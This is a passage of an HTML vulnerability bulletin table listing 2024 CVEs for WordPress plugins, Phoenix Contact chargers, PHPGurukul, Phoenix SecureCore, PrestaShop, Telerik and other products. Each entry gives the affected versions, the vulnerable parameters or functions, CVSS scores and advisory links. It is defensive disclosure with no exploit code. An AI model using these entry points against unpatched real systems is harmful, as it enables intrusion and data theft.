<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-6321" target="_blank">CVE-2023-6321</a><br><a href="https://bitdefender.com/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact/" target="_blank">cve-requests@bitdefender.com</a></td>
</tr>
<tr>
<td>P-THEMES--Porto Theme - Functionality<br> </td>
<td>The Porto Theme - Functionality plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.1.0 via the 'porto_portfolios' shortcode 'portfolio_layout' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3808&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3808" target="_blank">CVE-2024-3808</a><br><a href="https://themeforest.net/item/porto-responsive-wordpress-ecommerce-theme/9207399" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fea96f84-f75b-4f02-9ca8-f8fda439d565?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>P-THEMES--Porto Theme - Functionality<br> </td>
<td>The Porto Theme - Functionality plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.0.9 via the 'slideshow_type' post meta. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3809&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3809" target="_blank">CVE-2024-3809</a><br><a href="https://themeforest.net/item/porto-responsive-wordpress-ecommerce-theme/9207399" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5cdd3c1-6353-4bee-a4f9-5b7972f0970c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>P-THEMES--Porto<br> </td>
<td>The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3806&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3806" target="_blank">CVE-2024-3806</a><br><a href="https://themeforest.net/item/porto-responsive-wordpress-ecommerce-theme/9207399" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/98ccc604-79c6-4be9-acb0-23fc82a31dfa?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>P-THEMES--Porto<br> </td>
<td>The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via 'porto_page_header_shortcode_type', 'slideshow_type' and 'post_layout' post meta. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included. This was partially patched in version 7.1.0 and fully patched in version 7.1.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3807&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3807" target="_blank">CVE-2024-3807</a><br><a href="https://themeforest.net/item/porto-responsive-wordpress-ecommerce-theme/9207399" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bc3da9e-4b5f-4200-9df9-0ae953571377?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>PHOENIX CONTACT--CHARX SEC-3000<br> </td>
<td>A local low privileged attacker can use an untrusted search path in a CHARX system utility to gain root privileges. </td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28133&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28133" target="_blank">CVE-2024-28133</a><br><a href="https://cert.vde.com/en/advisories/VDE-2024-019" target="_blank">info@cert.vde.com</a></td>
</tr>
<tr>
<td>PHOENIX CONTACT--CHARX SEC-3000<br> </td>
<td>An unauthenticated remote attacker can extract a session token with a MitM attack and gain web-based management access with the privileges of the currently logged in user due to cleartext transmission of sensitive information. No additional user interaction is required. The access is limited as only non-sensitive information can be obtained but the availability can be seriously affected. </td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28134&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H" target="_blank" title="CVSS V3 Score">7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28134" target="_blank">CVE-2024-28134</a><br><a href="https://cert.vde.com/en/advisories/VDE-2024-019" target="_blank">info@cert.vde.com</a></td>
</tr>
<tr>
<td>PHOENIX CONTACT--CHARX SEC-3000<br> </td>
<td>A local attacker with low privileges can use a command injection vulnerability to gain root privileges due to improper input validation using the OCPP Remote service.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28136&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28136" target="_blank">CVE-2024-28136</a><br><a href="https://cert.vde.com/en/advisories/VDE-2024-019" target="_blank">info@cert.vde.com</a></td>
</tr>
<tr>
<td>PHOENIX CONTACT--CHARX SEC-3000<br> </td>
<td>A local attacker with low privileges can perform a privilege escalation with an init script due to a TOCTOU vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28137&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28137" target="_blank">CVE-2024-28137</a><br><a href="https://cert.vde.com/en/advisories/VDE-2024-019" target="_blank">info@cert.vde.com</a></td>
</tr>
<tr>
<td>PHPGurukul--Online Course Registration System<br> </td>
<td>A vulnerability was found in PHPGurukul Online Course Registration System 3.1. It has been declared as critical. This vulnerability affects unknown code of the file /admin/index.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264922 is the identifier assigned to this vulnerability.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5063&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5063" target="_blank">CVE-2024-5063</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Online%20Course%20Registration%20System/Online%20Course%20Registration%20System%20-%20Authentication%20Bypass.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264922" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264922" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.336236" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>PHPGurukul--Online Course Registration System<br> </td>
<td>A vulnerability was found in PHPGurukul Online Course Registration System 3.1. It has been rated as critical. This issue affects some unknown processing of the file news-details.php. The manipulation of the argument nid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264923.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5064&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5064" target="_blank">CVE-2024-5064</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Online%20Course%20Registration%20System/Online%20Course%20Registration%20System%20-%20SQL%20Injection%20-%202%20(Unauthenticated).md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264923" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264923" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.336238" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>PHPGurukul--Online Course Registration System<br> </td>
<td>A vulnerability classified as critical has been found in PHPGurukul Online Course Registration System 3.1. Affected is an unknown function of the file /onlinecourse/. The manipulation of the argument regno leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264924.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5065&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5065" target="_blank">CVE-2024-5065</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Online%20Course%20Registration%20System/Online%20Course%20Registration%20System%20-%20SQL%20Injection%20-%203%20(Unauthenticated).md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264924" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264924" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.336239" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>POSIMYTH Innovation--The Plus Addons for Elementor Pro<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in POSIMYTH Innovation The Plus Addons for Elementor Pro allows PHP Local File Inclusion.This issue affects The Plus Addons for Elementor Pro: from n/a through 5.2.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47178&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">8.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47178" target="_blank">CVE-2023-47178</a><br><a href="https://patchstack.com/database/vulnerability/theplus_elementor_addon/wordpress-the-plus-addons-for-elementor-pro-plugin-5-2-8-unauthenticated-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Phoenix--SecureCore for Intel Gemini Lake<br> </td>
<td>Potential buffer overflow in unsafe UEFI variable handling in Phoenix SecureCoreâ„¢ for Intel Gemini Lake.This issue affects: SecureCoreâ„¢ for Intel Gemini Lake: from 4.1.0.1 before 4.1.0.567.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1598&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1598" target="_blank">CVE-2024-1598</a><br><a href="https://www.phoenix.com/security-notifications/cve-2024-1598/" target="_blank">22d9ba52-f336-4b0d-bf1f-0efbdcc3c1de</a></td>
</tr>
<tr>
<td>Phoenix--SecureCore for Intel Kaby Lake<br> </td>
<td>Potential buffer overflow in unsafe UEFI variable handling in Phoenix SecureCoreâ„¢ for select Intel platforms This issue affects: Phoenix SecureCoreâ„¢ for Intel Kaby Lake: from 4.0.1.1 before 4.0.1.998; Phoenix SecureCoreâ„¢ for Intel Coffee Lake: from 4.1.0.1 before 4.1.0.562; Phoenix SecureCoreâ„¢ for Intel Ice Lake: from 4.2.0.1 before 4.2.0.323; Phoenix SecureCoreâ„¢ for Intel Comet Lake: from 4.2.1.1 before 4.2.1.287; Phoenix SecureCoreâ„¢ for Intel Tiger Lake: from 4.3.0.1 before 4.3.0.236; Phoenix SecureCoreâ„¢ for Intel Jasper Lake: from 4.3.1.1 before 4.3.1.184; Phoenix SecureCoreâ„¢ for Intel Alder Lake: from 4.4.0.1 before 4.4.0.269; Phoenix SecureCoreâ„¢ for Intel Raptor Lake: from 4.5.0.1 before 4.5.0.218; Phoenix SecureCoreâ„¢ for Intel Meteor Lake: from 4.5.1.1 before 4.5.1.15.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0762&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0762" target="_blank">CVE-2024-0762</a><br><a href="https://www.phoenix.com/security-notifications/cve-2024-0762/" target="_blank">22d9ba52-f336-4b0d-bf1f-0efbdcc3c1de</a></td>
</tr>
<tr>
<td>Phoenix--WinFlash Driver<br> </td>
<td>Exposed IOCTL with Insufficient Access Control in Phoenix WinFlash Driver on Windows allows Privilege Escalation which allows for modification of system firmware.This issue affects WinFlash Driver: before 4.5.0.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-35841&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-35841" target="_blank">CVE-2023-35841</a><br><a href="https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html" target="_blank">22d9ba52-f336-4b0d-bf1f-0efbdcc3c1de</a><br><a href="https://jvn.jp/en/vu/JVNVU93886750/index.html" target="_blank">22d9ba52-f336-4b0d-bf1f-0efbdcc3c1de</a><br><a href="https://www.phoenix.com/security-notifications/cve-2023-35841/" target="_blank">22d9ba52-f336-4b0d-bf1f-0efbdcc3c1de</a></td>
</tr>
<tr>
<td>PluginOps--Landing Page Builder<br> </td>
<td>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in PluginOps Landing Page Builder allows Reflected XSS.This issue affects Landing Page Builder: from n/a through 1.5.1.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34752&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34752" target="_blank">CVE-2024-34752</a><br><a href="https://patchstack.com/database/vulnerability/page-builder-add/wordpress-landing-page-builder-1-5-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>PluginUS--HUSKY Products Filter for WooCommerce (formerly WOOF)<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Control of Generation of Code ('Code Injection') vulnerability in PluginUS HUSKY - Products Filter for WooCommerce (formerly WOOF) allows Using Malicious Files, Code Inclusion.This issue affects HUSKY - Products Filter for WooCommerce (formerly WOOF): from n/a through 1.3.5.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32680&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32680" target="_blank">CVE-2024-32680</a><br><a href="https://patchstack.com/database/vulnerability/woocommerce-products-filter/wordpress-husky-plugin-1-3-5-2-remote-code-execution-rce-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Podlove--Podlove Podcast Publisher<br> </td>
<td>Missing Authorization vulnerability in Podlove Podlove Podcast Publisher.This issue affects Podlove Podcast Publisher: from n/a through 4.0.14.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32712&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32712" target="_blank">CVE-2024-32712</a><br><a href="https://patchstack.com/database/vulnerability/podlove-podcasting-plugin-for-wordpress/wordpress-podlove-podcast-publisher-plugin-4-0-14-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>PowerDNS--DNSdist<br> </td>
<td>When incoming DNS over HTTPS support is enabled using the nghttp2 provider, and queries are routed to a tcp-only or DNS over TLS backend, an attacker can trigger an assertion failure in DNSdist by sending a request for a zone transfer (AXFR or IXFR) over DNS over HTTPS, causing the process to stop and thus leading to a Denial of Service. DNS over HTTPS is not enabled by default, and backends are using plain DNS (Do53) by default.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25581&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25581" target="_blank">CVE-2024-25581</a><br><a href="https://dnsdist.org/security-advisories/powerdns-advisory-for-dnsdist-2024-03.html" target="_blank">security@open-xchange.com</a></td>
</tr>
<tr>
<td>Premmerce--Premmerce Permalink Manager for WooCommerce<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Premmerce Premmerce Permalink Manager for WooCommerce allows PHP Local File Inclusion.This issue affects Premmerce Permalink Manager for WooCommerce: from n/a through 2.3.10.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27971&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27971" target="_blank">CVE-2024-27971</a><br><a href="https://patchstack.com/database/vulnerability/woo-permalink-manager/wordpress-premmerce-permalink-manager-for-woocommerce-plugin-2-3-10-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>PrestaShop--PrestaShop<br> </td>
<td>PrestaShop is an open source e-commerce web application. A cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled through the front-office contact form, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administrator's right. This vulnerability is patched in 8.1.6. A workaround is to disable the customer-thread feature-flag.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34716&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34716" target="_blank">CVE-2024-34716</a><br><a href="https://github.com/PrestaShop/PrestaShop/releases/tag/8.1.6" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-45vm-3j38-7p78" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>ProfilePress Membership Team--ProfilePress<br> </td>
<td>Improper Privilege Management vulnerability in ProfilePress Membership Team ProfilePress allows Privilege Escalation.This issue affects ProfilePress: from n/a through 4.13.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41954&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L" target="_blank" title="CVSS V3 Score">8.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41954" target="_blank">CVE-2023-41954</a><br><a href="https://patchstack.com/database/vulnerability/wp-user-avatar/wordpress-profilepress-plugin-4-13-1-unauthenticated-limited-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Progress Software Corporation--Telerik Reporting<br> </td>
<td>In ProgressÂ® TelerikÂ® Reporting versions prior to 2024 Q2 (18.1.24.2.514), a code execution attack is possible by a local threat actor through an insecure deserialization vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4200&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4200" target="_blank">CVE-2024-4200</a><br><a href="https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-4200" target="_blank">security@progress.com</a></td>
</tr>
<tr>
<td>Progress Software Corporation--Telerik Reporting<br> </td>
<td>In ProgressÂ® TelerikÂ® Reporting versions prior to 2024 Q2 (18.1.24.514), a code execution attack is possible through an insecure instantiation vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4202&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4202" target="_blank">CVE-2024-4202</a><br><a href="https://docs.telerik.com/reporting/knowledge-base/instantiation-vulnerability-cve-2024-4202" target="_blank">security@progress.com</a></td>
</tr>
<tr>
<td>Progress Software Corporation--Telerik UI for WinForms<br> </td>
<td>A local code execution vulnerability is possible in Telerik UI for WinForms beginning in v2021.1.122 but prior to v2024.2.514. This vulnerability could allow an untrusted theme assembly to execute arbitrary code on the local Windows system.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3892&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3892" target="_blank">CVE-2024-3892</a><br><a href="https://docs.telerik.com/devtools/winforms/knowledge-base/local-code-execution-vulnerability-cve-2024-3892" target="_blank">security@progress.com</a></td>
</tr>
<tr>
<td>Proofpoint--Enterprise Protection<br> </td>
<td>The Proofpoint Encryption endpoint of Proofpoint Enterprise Protection contains an Improper Input Validation vulnerability that allows an unauthenticated remote attacker with a specially crafted HTTP request to create additional Encryption user accounts under the attacker's control.  These accounts are able to send spoofed email to any users within the domains configured by the Administrator.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3676&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3676" target="_blank">CVE-2024-3676</a><br><a href="https://www.proofpoint.com/us/security/security-advisories/pfpt-sa-2024-0002" target="_blank">security@proofpoint.com</a></td>
</tr>
<tr>
<td>Propovoice--Propovoice CRM<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Propovoice Propovoice CRM allows Stored XSS.This issue affects Propovoice CRM: from n/a through 1.7.6.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4747&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4747" target="_blank">CVE-2024-4747</a><br><a href="https://patchstack.com/database/vulnerability/propovoice/wordpress-propovoice-crm-plugin-1-7-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>QuanticaLabs--Chauffeur Taxi Booking System for WordPress<br> </td>
<td>Missing Authorization vulnerability in QuanticaLabs Chauffeur Taxi Booking System for WordPress allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Chauffeur Taxi Booking System for WordPress: from n/a through 6.9.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32692&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32692" target="_blank">CVE-2024-32692</a><br><a href="https://patchstack.com/database/vulnerability/chauffeur-booking-system/wordpress-chauffeur-taxi-booking-system-for-wordpress-plugin-6-9-broken-authentication-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Qube One Ltd.--Redirection for Contact Form 7<br> </td>
<td>Improper Privilege Management vulnerability in Qube One Ltd. Redirection for Contact Form 7 wpcf7-redirect allows Privilege Escalation.This issue affects Redirection for Contact Form 7: from n/a through 2.7.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-23990&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-23990" target="_blank">CVE-2023-23990</a><br><a href="https://patchstack.com/database/vulnerability/wpcf7-redirect/wordpress-redirection-for-contact-form-7-plugin-2-7-0-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Rank Math--Rank Math SEO<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Rank Math Rank Math SEO allows Path Traversal.This issue affects Rank Math SEO: from n/a through 1.0.107.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-23888&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-23888" target="_blank">CVE-2023-23888</a><br><a href="https://patchstack.com/database/vulnerability/seo-by-rank-math/wordpress-rank-math-seo-plugin-1-0-107-2-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Red Hat--Migration Toolkit for Containers<br> </td>
<td>A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3727&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3727" target="_blank">CVE-2024-3727</a><br><a href="https://access.redhat.com/security/cve/CVE-2024-3727" target="_blank">secalert@redhat.com</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2274767" target="_blank">secalert@redhat.com</a></td>
</tr>
<tr>
<td>Repute Infosystems--ARMember<br> </td>
<td>Improper Privilege Management vulnerability in Repute Infosystems ARMember allows Privilege Escalation.This issue affects ARMember: from n/a through 4.0.10.</td>
<td>2024-05-17</td>
